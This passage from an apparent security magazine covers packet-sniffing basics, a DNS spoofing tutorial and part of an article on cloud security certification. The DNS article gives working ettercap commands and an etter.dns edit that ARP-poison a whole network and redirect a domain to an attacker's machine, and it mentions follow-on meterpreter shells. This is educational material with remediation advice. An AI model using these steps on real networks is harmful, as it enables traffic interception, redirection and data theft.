necessary actions can be taken. Normally, there are three basic types of packet sniffing, and they are ARP sniffing, IP sniffing and MAC sniffing. In ARP sniffing, the information is transferred to the ARP cache of the hosts. The network traffic is di- rected towards the administrator. In IP sniffing, the information corresponding to an IP address filter is captured. MAC sniffing is similar to IP sniffing except for device sniffing information packets of a particu- lar MAC address. COMPONENTS OF PACKET SNIFFER Before delving in detail on how packet sniffers work, it is important to understand the components that are part of the sniffer. The four major parts of a sniffer are hardware, driver, buffer and packet analysis. Most packet sniffers work with common adapters, but some require multi adapters, wireless adapters and others. Before installing the sniffer in the system, diagnose whether the system contains the neces- sary adapter for the sniffer. Next important component for a sniffer to work is the drive program. Without the driver, the sniffer cannot be installed in the system. Once the sniffer is installed, it requires a buffer that is the storage device for capturing data from the network. There are two types in which data can be stored in the buffer. In the first method, the data can be stored in the buffer until the storage space runs out. This prevents new data from being stored as there is no storage space. The other method is to replace the old data with new data as and when the buffer over- flows. The forensic investigator or network administrator has the option to select buffer storage method. Also, the size of the buffer depends on the EMS memory (Expanded memory specification) of the com- puter. When the EMS memory of the computer is higher, more data can be stored in the buffer. The packet analysis is the most essential and core part of the sniffing process as it captures and analy- ses the data from the packets. Many advanced snipping tools have been introduced of late which allows users to replay the stored contents so that they can be edited and retransmitted based on requirements. WORKING PRINCIPLE The working principle of a sniffing tool is very simple. The network interfaces present in the segment will usually have a hardware address, and they can see the data that is transmitted over the physical me- dium. The hardware address of one network interface is designed to be unique so it should be different from the address of another network interface. Hence, packet that is transmitted over the network will pass through the host machines, but will be ignored by the machines except for the one to which the packet is destined to. However, in practice, this is not always the case because hardware addresses can be changed in software and virtualization technologies are frequently used to generate hardware ad- dresses for virtual machines from a set pool. In IP networks, each network has a subnet mask, network address and broadcast address. An IP ad- dress consists of two parts namely network address and host address. The subnet mask helps in sepa- rating the IP address into network and host address. The host address is further broken down as sub- net address and host address. The subnet mask identifies the IP address of the system by performing AND operation on netmask. It converts the network bits to 1 and host bits to 0. Any network will have two special reserved host addresses, 0 for network address and 255 for host address. Subnetting a network helps in breaking down bigger networks into smaller multiple networks. Network address is an address that identifies a node in a network. The network addresses are unique within a network and there can be more than one network address within any network. A broadcast address is a special address that is used to transmit messages to multiple recipients. Broadcast addresses help network administrators in verifying successful data transmission over the network. Broadcast address is used by various clients and the most important of them are dynamic host configuration protocol and bootstrap protocol that use the address to transmit server requests. When a network interface card is configured, it will respond to the target network having addresses that exist in the same network as designated by the subnet mask and network address. This is how packet sniffing works and the three basic steps of packet sniffing are collection, conversion and analysis. COLLECTION The first step in packet sniffing technique is the collection of raw data from the packets that travel along the network. The sniffer will switch the required network interface to promiscuous mode that will enable 34 www.eForensicsMag.com

data packets from hosts in the system to be captured. When this mode is turned off, only the packets that are addressed to a particular interface will be captured. When this mode is turned on, all packets received on a particular interface will be captured. Packets that are received by the NIC are stored in a buffer and then processed. It is important for forensic investigator or network administrator to understand where to fit in a packet sniffer for it to capture packets effectively. This is called tapping the wire or getting on the wire in which the packet sniffer is placed in the correct physical location. Placing the sniffer tool at the right position is as tough as analyzing the packets for information. Since there are hardware devices in connecting a network, placing the tool at wrong position will not fetch packets. As seen before, the network interface card should be in promiscuous mode for capturing the data that is flowing across the network. Usually, the operating systems do not allow the forensic investigator or network administrators to turn promiscu- ous mode on. Individual forensic investigator or network administrator privileges are required to enable this mode, and if that is not possible, packet sniffing cannot be carried out in that particular network. It is much easier to sniff around the packets in a network that has hubs installed because, when traffic is sent over a hub; it traverses to every port that is connected to the hub. Hence, once you connect the packet sniffer to an empty port of the hub, you will receive packets travelling across the hub. Figure 4. Example of one location where packet sniffer can be placed. Source: http://www.windowsecurity.com/articles- tutorials/misc_network_security/Network_Analyzers_Part1.html. The most common type of network is a switched network as it allows broadcast, multicast and unicast traffic. It also supports full duplex communication in which the host system can send and receive pack- ets simultaneously. This increases the complexity of setting up packet sniffing tool in a switched environ- ment. Also, the traffic that is sent to the broadcast address and the host machine can only be captured. Hence the visibility window for the packet sniffer is far lower in a switched environment. There are three common types of capturing data in a switched network and they are port mirroring, ARP Cache poisoning and hubbing out. Port mirroring is the simplest of the three ways by which pack- ets can be captured. The forensic investigator or network administrator must be able to access the com- mand line interface of the switch for enabling port mirroring. As a forensic investigator or network admin- istrator, you need to do is enter a command in the command line interface which enables the switch to copy traffic from one port to another. Another method of capturing the data in switched environment is hubbing out, which is a technique in which the target device and the analyzer are localized within a network by connecting them directly to the hub. In hubbing out method, forensic investigator or network administrator needs a hub and some network cables to connect the target to the hub. First, unplug the host from the network, followed by plug- ging the target and the analyzer to the hub. Then, connect the hub to a network switch which enables the data to be transferred to the nub and simultaneously to the analyzer. 35 www.eForensicsMag.com

In the seven layer OSI model, the second layer contains MAC addresses while the third layer contains IP addresses, and both these addresses should be used in conjunction for network data transfer. The switches are present in the second layer and hence, the MAC addresses should be converted to IP ad- dresses and vice versa for data transfer. This translation process is called as address resolution protocol. Whenever a computer needs to transfer data to another computer, an ARP request is sent to the switch, which then sends ARP broadcast packet to the systems that are connected to the computer. The target computer which has the equivalent IP address responds to the request by sending out its MAC address. This information is then stored in the cache so that future connections can use this data without sending out new request. This method can easily capture the traffic across the network, and hence ARP cache poisoning is otherwise called as ARP spoofing. CONVERSION In this step, the raw data that is captured in the collection step is converted to human readable form. The converted data can only be analyzed for information that can be useful for the network administrator. The work of most of the command prompt packet sniffers stop at this point of time and the remaining work are left over to the end forensic investigator or network administrator. ANALYSIS The third and final step of packet sniffing technique is analysis in which the data present in human read- able form is analyzed to gather required information. Multiple packets are compared to obtain the behav- ior of the network. The GUI based packet sniffing tools are handy at this time as they have comparison tools as well. All these methods ensure that the right packets are captured as part of packet sniffing technique. The network problems can be analyzed, and necessary actions can be taken by the network administrators to prevent further problem in the network. The three packet sniffing tools mentioned above are used widely among the audiences around the globe. The goal of analyzing data in computer forensics is to identify and explore the digital content for pre- serving and recovering the original data that is present. There are various instances where computer fo- rensics has come in handy for network administrators. Live analysis is the most effective technique as it ensures that the encrypted file systems can also be captured and analyzed. ABOUT THE AUTHOR Eric A. Vanderburg, MBA, CISSP,Director of Information Systems and Security at JURINNOV,Technology Leader, Author, Ex- pert Witness, and Cyber Investigator. 36 www.eForensicsMag.com

UNDERSTANDING DOMAIN NAME SYSTEM by Amit Kumar Sharma Domain Name System (DNS) DNS spoofing also referred to as DNS cache poisoning in the technical world is an attack wherein junk (customized data) is added into the Domain Name System name server’s cache database, which causes it to return incorrect data thereby diverting the traffic to the attacker’s computer. L et’s understand this attack today. For this we have to have an under- standing of the DNS first. So what we will do is understand the DNS and then we will see what is an ARP and a DNS spoofing attack. UNDERSTANDING DNS Any website has an identity for it, which is usually known as the domain name, but at the backend it is identified by an IP address. For any computer it is the IP address which matters but who tells the computer what the IP address for a specific Website is or vice versa. It is the DNS. DNS is responsible for the translation of the domain name to an IP address. If you type an address in the address bar, believe me a lot of things go on in the background. The DNS server translates the domain name into an IP ad- dress and this process is called as DNS resolution. RFC1035 describes the DNS protocol wherein it is recommended that the DNS should generally operate over the UDP protocol. UDP is preferred over the TCP for most DNS requests for its low overhead. You can find more details about DNS under the following RFC’s • IETF RFC 1034: DOMAIN NAMES – CONCEPTS AND FACILITIES • IETF RFC 1912: COMMON DNS OPERATIONAL AND CONFIGURA- TIONAL ERRORs • IETF RFC 2181: CLARIFICATION TO THE DNS SPECIFICATIONS • IETF RFC 1035: DOMAIN NAMES – IMPLEMENTATION AND SPECIFI- CATION PORT 53 Out of all the ports existing PORT 53 was the one which was chosen to run the DNS service. Port 53 supports both TCP and UDP. TCP is given the re- sponsibility for zone transfers of full name record databases whereas UDP handles individual lookups. 37 www.eForensicsMag.com

TCP is used for handling zone transfer because of its connection oriented nature. This nature helps the DNS servers to establish connection between them to transfer the zone data wherein the Source and Destination DNS Servers are responsible to make sure about consistency by may be using the TCP ACK bit or some other logic which varies. One thing that we have to keep in mind is that zone transfers are prone to give away the entire network maps. The UDP used in port 53 is a connection less communications protocol for a couple of layers including the Internet network layer, transport layer, and session layer. It makes the transmission of a datagram message from one computer to an application running in another computer possible on port 53. UDP also plays an important role when it comes to performance and resolution of DNS. As it is a con- nectionless protocol there is no need for it to maintain state or connections thereby making it more ef- ficient. When a DNS message is sent across messages are sent over UDP and DNS servers bind it to UDP port 53. If the message length exceeds the default message size for a UDP datagram (512 octets), the first response to the message is sent with as much data as the UDP datagram will allow, and then the DNS server sets a flag indicating a truncated response. Later it is the responsibility of the message sender on how to send the next message i.e over TCP or UDP again. So if you get a PORT 53 open on a port scanning results. Bingo you may try attacks pertaining to it. Let’s go a little deeper to understand what is meant by DNS resolving. DNS RESOLVING The jinx here is that we humans are good at remembering things related to Alphabets and the reverse is true with our counterparts “The Computer System” which understands numbers better. All the comput- ers are identified on the basis of their number and it is really difficult for a human brain to remember so many numbers “The IP address” of the various servers around the world which has huge data that end user wanted to access. So DNS came to the rescue. It actually resolves the actual names (Domain name) that is fairly simple to remember into the IP address of the servers. DNS can be treat as a huge database which has millions of records each conveying on what IP address is for what domain. A trivial example will look like. TYPE VALUE NAME A 127.0.0.1 A 192.168.1.3 Admin A 192.168.1.5 Site.test.com MX 0 Site.victim.org A 192.168.1.7 Site.example.com. CNAME 192.168.1.11 Mywebsite.com CNAME 192.168.1.219 Mail CNAME 192.168.1.82 ftp CNAME 192.168.1.19 ftp www Now let us consider that the end user which wants to visit a website called as www.searchforme.com Let us see on what are the steps that takes place at the backend and my browser shows me the web- page with a blink of an eye. “WINK” ;) When we write www.searchforme.com in the address bar of the browser, we actually don’t notice that we also have an invisible ‘.’ at the end of this address. This powerful ‘.’ is called as the ROOT. Once we write the address, your web browser or your operating system will first determine whether they know this domain already by looking in a local file on your computer called “host”. This file contains domain names and their associated IP address. If they know it they will return the domain but if not there are other 38 www.eForensicsMag.com

people who get involved and the search becomes dirtier. All the OS’s are configured or designed to ask a resolving name server the same question of the whereabouts of www.searchforme.com. And all the resolving name servers are so designed that they know the location of the ROOT Server. Considering that we have got hard luck and we didn’t still find where our website is, we will take it as a NO from the ROOT server which in turn queries the TLD (Top Level Domain) Name server for the address. Now the TLD name server in case doesn’t get the answer for our website queries the Authoritative Name Server (ANS). Now here is the turning point as in how does this server know about the address of the queried website. The answer is the DOMAIN Registrar which keeps a record of all the domains which are purchased and the details of the buyer and the authenticity of the same. It also has a record, on, which Authoritative Name Server to be used for this specific Domain. They also notify the organization responsible for the Top Level Domain which is called as the registry which in turn updates the TLD Name Servers of the domain. Now the resolving name server takes the response from the TLD name server and stores it in their cache and finally reaches to the Authoritative Name Server which resolves the www.searchforme.com server to its corresponding IP address. Finally the resolving server fetches this query and gives back to the OS which in turn directs the brows- er to reach out to the IP address. Gosh so many things go at a time so fast!!! Now to increase the performance of all these activities, all these intermediate servers store the request and response queries in their CACHE to ensure that when any similar queries arrives, the servers picks up from the cache instead of reaching out to the Registry all the time. DNS TERMINOLOGIES The whole of DNS can be treated as a tree structure wherein the ROOT is at the top and subdivided into DOMAIN’s, subdomains and zones. DOMAIN NAME AND ZONES The domain Name Space is divided into the following though the list may be non-exhaustive • Com: commercial organizations. • Edu: Educational organizations. • Gov: Government organizations • Mil: Military organizations • Net: Networking organizations • Org: noncommercial organizations • Aero: air-transport industry • Biz:for businesses purposes • Coop: for cooperatives • info: For all uses • Museum: For the museums • Name: For the individuals • Pro: For professions There are others as well which are based on the country like ie for Ireland and .jp for Japan. And be- lieve me with the increase in the Internet this list is tremendously increasing and becoming more and more structural. Now all these domains are further divided into subdomains and then to Zones. Below is a small dem- onstration of the tree structure for understanding. 39 www.eForensicsMag.com

Figure 1. DNS tree structure* *: This diagram is only for demonstration purpose. All the ones in orange are called as TLD(Top level Domains). These domains in turn have subdomains which further are classified as different zones. Now for an instance if we see that we want a Fully Qualified Domain Name (FQDN) for the domain “ok- ies”, it will be “Okies.m.test.com”, where m can be a subdomain for domain test. When a query is generated for the DNS it is usually for the ‘A’ type record which directly translates the domain to the IP address. The table below shows generic calls/queries and more parameters can be found at: http://www.iana. org/assignments/dns-parameters. Type Value Description A 1 IPv4 Address AAAA 28 IPv6 Address NS 2 Name Server AXFR 252 Request for Zone Transfer MX 15 Mail Exchange CNAME 5 Canonical Name Before moving to the evil part we should also concentrate on the AAAA type for the IPV6 address. With the advent of IPV6 address in the huge internet we cannot ignore its concepts and its role in DNS. AAAA (Quad A) records are the IPv6 address records which map a host name to an IPv6 address. This stands for AUTHENTICATION, AUTHORIZATION, ACCOUNTING, AUDITING. AAAA record type is ca- pable of storing a 128 bit iPV6 address. Similarly an AAAA query for a specified domain name returns all the associated AAAA records in the response. Lets get down to do some evil part now. 40 www.eForensicsMag.com

THE EVIL (FUN) PART J As we noticed that DNS is a very crucial part of the internet and plays a very important role in the resolv- ing of the websites thereby making the end user experience easy. But this functionality can be used in the other way to make all this, a bad experience. There are a cou- ple of vulnerabilities or weakness present with DNS and its functionality. So if we are not able to config- ure our DNS server properly we can be in BIG trouble. An evil mind can do a lot of tweaks and believe me, can be very harmful if he/she are able to exploit the DNS. There are a couple of vulnerabilities which are present with respect to the DNS like: • DNS cache Poisoning • Denial of service attack (which nearly runs for everything) • Unauthorized Zone transfer • Buffer overflow • Hijacking • DNS Misconfiguration • Spoofing the DNS response We will discuss cache poisoning and spoofing as a part of this article. Figure 2. A typical DNS cache in a windows machine DNS SPOOFING DNS spoofing is said to happen when a DNS server starts accepting and using incorrect information from an illegitimate HOST who has provided the required information. During this attack malicious data is suc- cessfully placed in the Cache of the server. This misleads the authority with the user getting redirected to a wrong website which can be the one hosted form a malicious user and can hijack the user who will not even come to know that something wrong has happened. 41 www.eForensicsMag.com

This spoofing can be done in a number of ways: • DNS cache Poisoning • Breaking the Platform- Really Tough • Spoofing the DNS response Let’s see how we can spoof the DNS through Cache Poisoning. DNS CACHE AND POISONING When we type a URL in the address bar we actually are sending a DNS query. A record of these queries is also stored in a temporary storage location on your computer called as DNS cache. Now the DNS always checks the cache before querying any of the DNS servers and if a record is found it uses that instead of querying the server which in turn makes the query faster and decreases the network traffic as well. So our target is this cache. If we are successful in poisoning the cache with the flaw in the DNS soft- ware, and if the server does not correctly validate DNS responses to ensure that they are from an au- thentic source, the server will end up caching the incorrect entries locally and serve them to other users that make the same request (see Figure 2). Get your Hacker Hat (ofcourse the White One) and start your weapon. For me the weapon is my Back- Track Machine which I have named as ARCHIE 192.168.1.7 Ettercap is a very famous tool that we are going to use here. This tool is also available for windows. It has various uses but for this exercise we will use it to spoof the DNS. We are choosing ettercap for two reasons. One is it is awesomely user friendly and easy to use and second because of its easily accessible dns_spoof library in handy. Figure 3. Attack Perspective www.eForensicsMag.com Step 1-Victim Sends DNS query Step 2-Fake DNS reply Step 3-Victim unknowingly starts communicating Below is a sample diagram for the attacker and the victim machine. • OUR Attacker machine 192.168.1.7 • Our victim machine is a windows machine 192.168.1.19 42

Figure 4. Attacker and the Victim Machine So what we will try to do is first we will perform ARP Spoofing and then try to poison the cache and then try to access the poisoned cache and verify the results. Prerequisite that you should cross check is. Check whether IP forwarding is enabled or not in the file. /proc/sys/net/ipv4/ip_forward If the value is ‘0’ which here is, you need to change it to ‘1’ with the command Echo 1 > /proc/sys/net/ipv4/ip_forward Next is to locate the etter.dns file by the command Locate etter.dns You can use the utility of Linux VI editor or NANO for editing purposes. Now edit the file in the location: vi /usr/local/share/ettercap/etter.dns To add the following entry *.mywebsite.com as the name and ‘A’ being the type to the IP address 192.168.1.7 which is the ad- dress the attackers machine (my Backtrack machine in this case). This ensures that any traffic towards the *.mywebsite.com will be redirected to my machine. 43 www.eForensicsMag.com

Now consider a victim machine which is with the IP address 192.168.1.19 has Windows 7 as Operating system. Now let us see what are the results of the ping our “www.mywebsite.com.” Pinging results gives us the IP address as 64.120.230.71 with the behavior as expected. Screen shot below Figure 5. Victim machine before the attack Now let us perform the attack. The command from ettercap is ettercap -T -q -M arp:remote -P dns_spoof // This will actually launch an Arp poisoning attack for the entire network we are connected to. So please be cautious before trying this attack Now once the attack starts we go back to our victim machine and ping the website again to see whether our attack is working or not. 44 www.eForensicsMag.com

Figure 6. Victim Machine after the attack Bingo there it is, the attack was successful. So with this we were successfully able to spoof the DNS and redirect all the traffic coming to www.mywebsite.com to our IP address. Now it depends on the attacker on how much damage he wants to cause from getting a Metasploit meterpreter shell to steal data etc. To explore more of the tool you can use the following command: Ettercap –h The same thing can be done via the GUI of ettercap as well which is very easy to use. Below are the steps. For the GUI of ettercap either you can download directly from the website or if you are using BackTrack the following command comes in handy. 45 www.eForensicsMag.com

Ettercap -G This will launch the ettercap GUI. Below is the interfaceJ: Figure 7. Ettercap GUI interface Next you have to select the interface. In this case it is “eth0”: Figure 8. Selecting your network interface Once you haveselected OK, the following plugins load and are ready to use. Next we click on HOSTS tab and click on Scan HOST 46 www.eForensicsMag.com

Figure 9. Host menu item On scanning host ettercap will scan for all the hosts that are alive. Now we can select from this list of hosts and add to the target list. Once you have added the target IP in the target list which in this case is 192.168.1.19. Next we select the MITM menu item and click on ARP poisoning. Figure 10. Performing ARP poisoning The window below pops up and now click on OK. Figure 11. ARP poisoning Once you click on OK the tool performs the attack by sending the ARP packets. For launching the DNS spoof attack. 47 www.eForensicsMag.com

Go to the PLUGIN menu item. Scroll down to search for the dns_spoof plugin. Double clicking on the same will launch this plugin and hence spoof the dns. Figure 12. dns_spoof plugin REMEDIATION IF you see the basic working of DNS queries the remediation will be right in front of your eyes. These attacks are not effective if the attacker is not able to send the initial query of identification of a domain. For this you can limit the access to the computers which you rely or which are required. Performing end to end validation post the connection is established can be used to check for the authenticity of data. One very effective solution can be the randomization of source port for DNS requests. Other solutions can be upgrading your DNS servers to inculcate security with DNSSEC. Performing the configuration of name severs in a proper manner keeping in mind the security aspect of it. Auditing the servers regularly to check on any kind of security flaws and implementing the patches regularly as and when required pe- riodically has to be performed to be safe. WORD OF CAUTION Do not use this attack on a live network. Please make up a small environment and perform the attack only for education basis and to learn the concepts. REFERENCES • http://www.dns.net/dnsrd/ • http://cr.yp.to/djbdns/notes.html • http://www.sans.org • http://www.google.com ABOUT THE AUTHOR Amit Kumar Sharma commonly known as AKS-44 has a B.E in EC and works in Information Security for a reputed firm. He is passionate about Security and spends his time learning/researching in the wild. 48 www.eForensicsMag.com

CSA CERTIFICATION OFFERS SIMPLE, COST EFFECTIVE WAY TO EVALUATE AND COMPARE CLOUD PROVIDERS by John DiMaria Technological developments, constricted budgets, and the need for flexible access have led to an increase in business demand for cloud computing. Many organizations are wary of cloud services, however, due to apprehensions around security issues. Ernst & Young conducted a survey of C-level leaders in 52 countries which showed a unified concern over the accelerated rate that companies are moving information to the cloud and the subsequent demise of physical boundaries and infrastructure. T he widespread adoption of mobile devices only serves to accelerate this trend. Now employees, customers, suppliers, and other stakehold- ers can access data wherever and whenever they wish, intensifying concerns surrounding security and privacy. (Ernst & Young 2011 Global Infor- mation Security Survey – Out of the Cloud into the fog, 2011). Companies are moving from traditional IT staffing outsourcing contracts to cloud service providers, forever altering their business model and IT func- tions, with the potential to greatly reduce or even eliminate in-house IT opera- tions. Security and quality must be of highest concern, and focused on the most important assets any company has …. customers and stakeholders. BSI, a leading certification body and business improvement solutions pro- vider in 2012 teamed up with the Cloud Security Alliance (CSA), an independ- ent not-for-profit coalition comprised of industry leaders, associations, and in- formation security experts. Together they identified serious gaps within the IT ecosystem that inhibit market adoption of secure and reliable cloud services. They found that businesses did not have simple, cost effective ways to evalu- ate and compare their providers’ resilience, data protection capabilities and service portability. CSA and BSI recognized that there was no single program, regulation or other compliance regime that would meet the future demands of IT as well as address the risk of adding complexity to the already overloaded and costly 49 www.eForensicsMag.com

compliance landscape. The rise of the cloud as a global computer utility, however, demands better har- monization of compliance concerns and business needs. The Ernst & Young survey supported their findings, which revealed that while companies are trying to respond, they fully admit that the information security budget may not be effectively applied. Just over half of companies indicated that their security functions do not meet the needs of the organization. Most admit that they have a heavy reliance on trust when it comes to outsourcing IT services, but what they need are validation, verification, and certification. The vast majority of companies are ready to man- date a “Standard of Care” and “Due Diligence” with almost ninety percent in favor of external certification and forty-five percent insisting it be based on an agreed upon internationally-accepted standard. While there was already a self-declaration process available through the CSA Security, Trust and Assur- ance Registry (STAR), it was evident that without a formal validation and verification process that complies with international standards, self-declaration would not fill the need for transparency and trust. There were also questions regarding whether or not the scope of self-declaration was fit-for-purpose as there was no real measurement of how the processes were to be managed to ensure optimization (maturity). BSI developed a process that would be user friendly, allow 3rd party validation and verification, and provide a formal certification that would be internationally accepted. After many discussions with users, industry experts, and service providers, it was clear that any “new” standard would be overkill and just add to the confusion of the plethora of standards already in existence. A new standard would also have to build credibility over the long term thus inhibiting adoption. ISO/IEC 27001 – THE FOUNDATION FOR STAR CERTIFICATION The gold standard since 2005, ISO/IEC 27001 is the most accepted internationally-endorsed standard for information security in the world. In some countries, like Japan, ISO/IEC 27001 has been mandated by the government particularly for publicly-traded companies, but over the years has cascaded down through the supply-chain. Many other countries are jumping on board by requiring tighter controls over information security across a variety of industries, as well as their critical suppliers and extended business partners. Companies also realize they must be leaner, asking more of each employee while settling for smaller budgets. Moving to the cloud is in part a reaction to increased IT costs as it provides more IT services for a smaller investment. Unfortunately, it comes with increased risk, and companies are looking for a globally-accepted standard and 3rd party verification that can serve as a screening process for suppliers, particularly Cloud Service Providers. ISO 27001 has a long history going back to 1995 when BS 7799 was introduced. It was improved over the years taking into consideration the ever-changing compliance and regulatory landscape for information security. 50 www.eForensicsMag.com


Like this book? You can publish your book online for free in a few minutes!
Create your own flipbook